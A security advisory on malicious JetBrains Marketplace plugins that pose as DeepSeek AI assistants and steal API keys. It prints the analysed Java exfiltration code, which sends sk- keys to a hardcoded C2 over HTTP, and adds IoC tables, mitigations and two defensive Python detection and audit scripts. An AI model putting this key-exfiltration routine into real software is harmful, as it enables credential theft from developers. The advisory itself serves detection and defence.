Supply Chain Attack Compromises JetBrains Marketplace, Exposing 70,000 Developers to Credential Theft
Researchers have uncovered a supply chain campaign that abuses the trust developers place in the JetBrains Marketplace. The malicious plugins involved account for roughly 70,000 installs (the per-plugin counts in the IoC tables below sum to just under that figure), exposing those developers to a silent credential-theft operation that siphons high-value API keys out of their integrated development environments (IDEs).
The campaign relies on at least 15 distinct malicious plugins posing as legitimate, high-utility AI coding assistants. Riding the hype around Large Language Models (LLMs), and DeepSeek in particular, the plugins deliver genuine if limited functionality such as automated code review, a chat interface, and commit message generation. That working front end gets them past superficial scrutiny, while the underlying logic quietly exfiltrates the API keys users enter.
Anatomy of the Attack: Stealthy Exfiltration Logic
The campaign has shown considerable longevity and adaptability. Operating under seven vendor personas, the plugins have been live since late 2025, with new ones appearing as recently as mid-2026 (see the First Observed column below). Despite JetBrains' manual review process, the attackers embedded the exfiltration routine inside an ordinary settings-save handler, where it reads like routine input validation and is easy to miss in a cursory review.
According to research by Aikido Security, the primary objective is the theft of API credentials for providers such as OpenAI, DeepSeek, and SiliconFlow. These keys are billed to their owner, so a stolen key can be used to burn through the victim's paid quota or resold on underground marketplaces.
Technical analysis indicates that the exfiltration is triggered by an ordinary "save" event. When a user enters an API key in the plugin's settings, the following logic executes:
```java
public static void save(String key) {
    // Only keys shaped like OpenAI secret keys are taken: "sk-" prefix and
    // exactly 51 characters. ks is a collection; if it is a Set, add() returns
    // false for a key already seen, so each key is sent to the C2 only once.
    if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
        SoftwareDto dto = new SoftwareDto();
        dto.setApiKey(key);
        // Ships the key to the attacker's server in the same call that "saves" it locally.
        BaseUtil.request("key", dto);
    }
}
```
The stolen payload is then transmitted over unencrypted HTTP to a hardcoded Command-and-Control (C2) server. The lack of TLS points to weak operational security (OPSEC) on the attackers' part; the static X-Api-Key header merely identifies the plugin to the C2, and both that token and the stolen key cross the network in cleartext, which is exactly what makes the traffic easy to spot:
```java
// Plain HTTP to a hardcoded C2 address (defanged here); "name" is the endpoint, e.g. "key".
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
// Static token identifying the plugin to the C2; it is the same in every build.
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D");
```
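Because the request goes out as cleartext HTTP with a fixed header and a recognisable body, it can be caught at the egress point. The following is an added example (not Aikido's or JetBrains' code) that runs three detection rules over egress events: the known C2 host, the campaign's static X-Api-Key, and, more generally, any sk- style secret leaving over plaintext HTTP. It assumes proxy or network logs have already been normalised into the dict shape used below; the SAMPLE_EVENTS are constructed for the demonstration, and the secret regex is deliberately broader than the plugin's own 51-character filter.

```python
"""Detect the plugin's exfiltration traffic in egress events (added example)."""
import re

C2_HOSTS = {"39.107.60.51"}                # IoC table on this page
C2_TOKEN = "F48D2AA7CF341F782C1D"          # static X-Api-Key used by the plugin
# Broader than the plugin's own "sk-" + 51-char filter: any sk- token of 20+ chars.
SECRET_RE = re.compile(r"\bsk-[A-Za-z0-9_-]{20,}")

# Constructed events, not real captures. Field names are this example's assumption.
SAMPLE_EVENTS = [
    {   # the plugin's exfil POST
        "src": "10.0.5.21", "dst": "39.107.60.51", "scheme": "http", "method": "POST",
        "path": "/api/software/key",
        "headers": {"X-Api-Key": C2_TOKEN, "Content-Type": "application/json"},
        "body": '{"apiKey":"sk-' + "A" * 48 + '"}',
    },
    {   # legitimate use of the same key over TLS: must not be flagged
        "src": "10.0.5.21", "dst": "api.openai.com", "scheme": "https", "method": "POST",
        "path": "/v1/chat/completions",
        "headers": {"Authorization": "Bearer sk-" + "A" * 48},
        "body": '{"model":"gpt-4o","messages":[]}',
    },
    {   # unrelated host, but a key leaves in cleartext: flagged by the generic rule
        "src": "10.0.5.22", "dst": "203.0.113.7", "scheme": "http", "method": "POST",
        "path": "/upload", "headers": {}, "body": "token=sk-" + "b" * 40,
    },
]


def reasons_for(event):
    """Return the list of rules the event trips (empty if it looks benign)."""
    reasons = []
    if event["dst"] in C2_HOSTS:
        reasons.append("destination is a known C2 host")
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    if headers.get("x-api-key") == C2_TOKEN:
        reasons.append("request carries the campaign's static X-Api-Key")
    if event["scheme"] == "http":
        # Cleartext transport: look for a secret anywhere in body or headers.
        blob = event.get("body", "") + " " + " ".join(headers.values())
        if SECRET_RE.search(blob):
            reasons.append("sk- secret transmitted over plaintext HTTP")
    return reasons


def scan(events):
    """Map event index -> reasons for every event that trips at least one rule."""
    return {i: r for i, e in enumerate(events) if (r := reasons_for(e))}


if __name__ == "__main__":
    for i, why in scan(SAMPLE_EVENTS).items():
        e = SAMPLE_EVENTS[i]
        print(f"[{i}] {e['src']} -> {e['scheme']}://{e['dst']}{e['path']}: " + "; ".join(why))
```

The first event trips all three rules, the OpenAI call over HTTPS trips none, and the third trips only the generic rule. That last rule is the one worth keeping after this campaign is over: an AI provider key should never leave a workstation on port 80, whatever the destination.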
In a particularly cynical twist, some of the plugins offer a paid tier. Users who pay for premium features receive API keys served from the attacker's server, that is, credentials stolen from earlier victims and recycled, so paying customers unknowingly run their requests against someone else's account.
The Expanding Threat Landscape
This incident is not an isolated event but part of a growing trend of targeting the “developer workstation.” Because IDEs act as centralized hubs for source code, cloud access tokens, and sensitive environment variables, they are prime targets for supply chain compromises. We are seeing a parallel evolution in other ecosystems, such as the “GlassWorm” campaign targeting VS Code users.
Indicators of Compromise (IoCs)
Network Indicators
| Type | Indicator | Description |
|---|---|---|
| IP Address | 39.107.60[.]51 | Primary C2 / Exfiltration Endpoint |
Malicious JetBrains Plugins
| Plugin Name | Plugin ID | Approx. Installs | First Observed |
|---|---|---|---|
| DeepSeek Junit Test | org.sm.yms.toolkit | 1,121 | 2025-10-31 |
| DeepSeek Git Commit | com.json.simple.kit | 1,894 | 2025-11-01 |
| DeepSeek FindBugs | org.bug.find.tools | 1,485 | 2025-11-09 |
| DeepSeek AI Chat | org.translate.ai.simple | 1,317 | 2025-11-23 |
| DeepSeek Dev AI | com.yy.test.ai.simple | 740 | 2025-11-30 |
| DeepSeek AI Coding | com.dev.ai.toolkit | 450 | 2025-12-06 |
| AI FindBugs | com.json.view.simple | 623 | 2025-12-14 |
| AI Git Commitor | com.my.git.ai.kit | 301 | 2026-01-10 |
| AI Coder Review | org.check.ai.ds | 735 | 2026-01-11 |
| DeepSeek Coder AI | com.review.tool.code | 3,498 | 2026-01-15 |
| AI Coder Assistant | org.code.assist.dev.tool | 319 | 2026-02-01 |
| DeepSeek Code Review | com.coder.ai.dpt | 278 | 2026-04-18 |
| CodeGPT AI Assistant | com.my.code.tools | 25,571 | 2026-06-09 |
| DeepSeek AI Assist | ord.cp.code.ai.kit | 27,727 | 2026-06-10 |
| Coding Simple Tool | com.dp.git.ai.tool | 3,931 | N/A |
Malicious Vendor Accounts
| Vendor Display Name | Vendor ID / Handle |
|---|---|
| CodePilot | mycode |
| StackSmith | misshewei |
| CodeCrafter | keteme |
| CodeWeaver | simpledev |
| JetCode | skyblue |
| DailyCode | dialycode |
| ZenCoder | 947cb4c8-5db1-4cf0-8182-0aae7c433bb3 |
Note: the IP address has been defanged with [.]. Do not browse to it or resolve it from a production network.
Mitigation and Defense
Security teams and individual developers should take the following immediate actions:
- Audit Plugins: Review every installed JetBrains plugin and remove any whose ID matches the list above, any published by the vendor accounts above, or any that otherwise look suspicious.
- Credential Rotation: If you have entered any AI provider API key (OpenAI, Anthropic, DeepSeek, SiliconFlow, etc.) into an IDE plugin, assume it is compromised, rotate it immediately, and check the provider's usage and billing history for activity you do not recognise.
- Implement Least Privilege: Use scoped, per-project API keys with limited permissions and spending limits rather than account-wide master keys wherever the provider supports it.
- Enhance Monitoring: Keep an inventory of the plugins installed on developer workstations (these are not covered by dependency-focused Software Composition Analysis), block the C2 address at the egress firewall, and alert on plaintext HTTP POST requests from developer machines to unknown endpoints.
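The plugin audit above can be scripted against the IDE's plugin directory. The following is an added example (not Aikido's or JetBrains' code) that walks a plugins directory, reads each plugin's ID from META-INF/plugin.xml inside its jars, and matches it against the IoC table, then string-scans the class files for the C2 address and static token, which catches a renamed re-upload of the same code. It assumes the standard on-disk layout of `<plugins-dir>/<plugin>/lib/*.jar` (or a bare `.jar`); the directory location varies by OS and product version, so pass it as the first argument. Without an argument it builds and scans a constructed fixture so the script runs offline.

```python
"""Audit a JetBrains plugins directory against this page's IoCs (added example)."""
import os
import sys
import tempfile
import zipfile
import xml.etree.ElementTree as ET

# Plugin IDs from the IoC table above.
MALICIOUS_IDS = {
    "org.sm.yms.toolkit", "com.json.simple.kit", "org.bug.find.tools",
    "org.translate.ai.simple", "com.yy.test.ai.simple", "com.dev.ai.toolkit",
    "com.json.view.simple", "com.my.git.ai.kit", "org.check.ai.ds",
    "com.review.tool.code", "org.code.assist.dev.tool", "com.coder.ai.dpt",
    "com.my.code.tools", "ord.cp.code.ai.kit", "com.dp.git.ai.tool",
}
# Literals that sit unobfuscated in the plugin's class-file constant pool.
C2_STRINGS = [b"39.107.60.51", b"F48D2AA7CF341F782C1D"]


def plugin_jars(plugins_dir):
    """Yield (plugin dir name, jar path) for <plugin>/lib/*.jar and bare .jar files."""
    for entry in sorted(os.listdir(plugins_dir)):
        path = os.path.join(plugins_dir, entry)
        if os.path.isfile(path) and path.endswith(".jar"):
            yield entry, path
        elif os.path.isdir(path):
            lib = os.path.join(path, "lib")
            if os.path.isdir(lib):
                for jar in sorted(os.listdir(lib)):
                    if jar.endswith(".jar"):
                        yield entry, os.path.join(lib, jar)


def plugin_id(zf):
    """Read <id> from META-INF/plugin.xml, or None if this jar has no descriptor."""
    try:
        root = ET.fromstring(zf.read("META-INF/plugin.xml"))
    except KeyError:
        return None
    node = root.find("id")
    return node.text.strip() if node is not None and node.text else None


def audit(plugins_dir):
    """Return a list of (plugin dir name, plugin id, reason) findings."""
    findings = []
    for name, jar in plugin_jars(plugins_dir):
        with zipfile.ZipFile(jar) as zf:
            pid = plugin_id(zf)
            if pid in MALICIOUS_IDS:
                findings.append((name, pid, "plugin id on IoC list"))
            for member in zf.namelist():
                if not member.endswith(".class"):
                    continue
                data = zf.read(member)
                hits = [s.decode() for s in C2_STRINGS if s in data]
                if hits:
                    findings.append((name, pid, f"{member} contains {hits}"))
    return findings


def build_fixture(base=None):
    """Constructed plugins dir: one benign plugin and one matching the IoCs."""
    base = base or tempfile.mkdtemp()

    def make_jar(path, pid, class_bytes):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/plugin.xml",
                        f"<idea-plugin><id>{pid}</id><name>x</name></idea-plugin>")
            zf.writestr("com/example/BaseUtil.class", class_bytes)

    make_jar(os.path.join(base, "GoodTool", "lib", "good.jar"), "com.example.good",
             b"\xca\xfe\xba\xbe https://api.example.com/v1/")
    make_jar(os.path.join(base, "CodeGPT", "lib", "codegpt.jar"), "com.my.code.tools",
             b"\xca\xfe\xba\xbe http://39.107.60.51/api/software/\x00X-Api-Key\x00F48D2AA7CF341F782C1D")
    return base


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_fixture()
    results = audit(target)
    for name, pid, why in results:
        print(f"{name}\t{pid}\t{why}")
    if not results:
        print("no findings")
```

The string scan only catches literals left in the clear; a rebuilt variant that obfuscates the address or token would slip past it, so treat the ID match as the reliable signal and the string hits as a bonus. On a real workstation, remove any plugin the script reports and rotate every key that was ever typed into it.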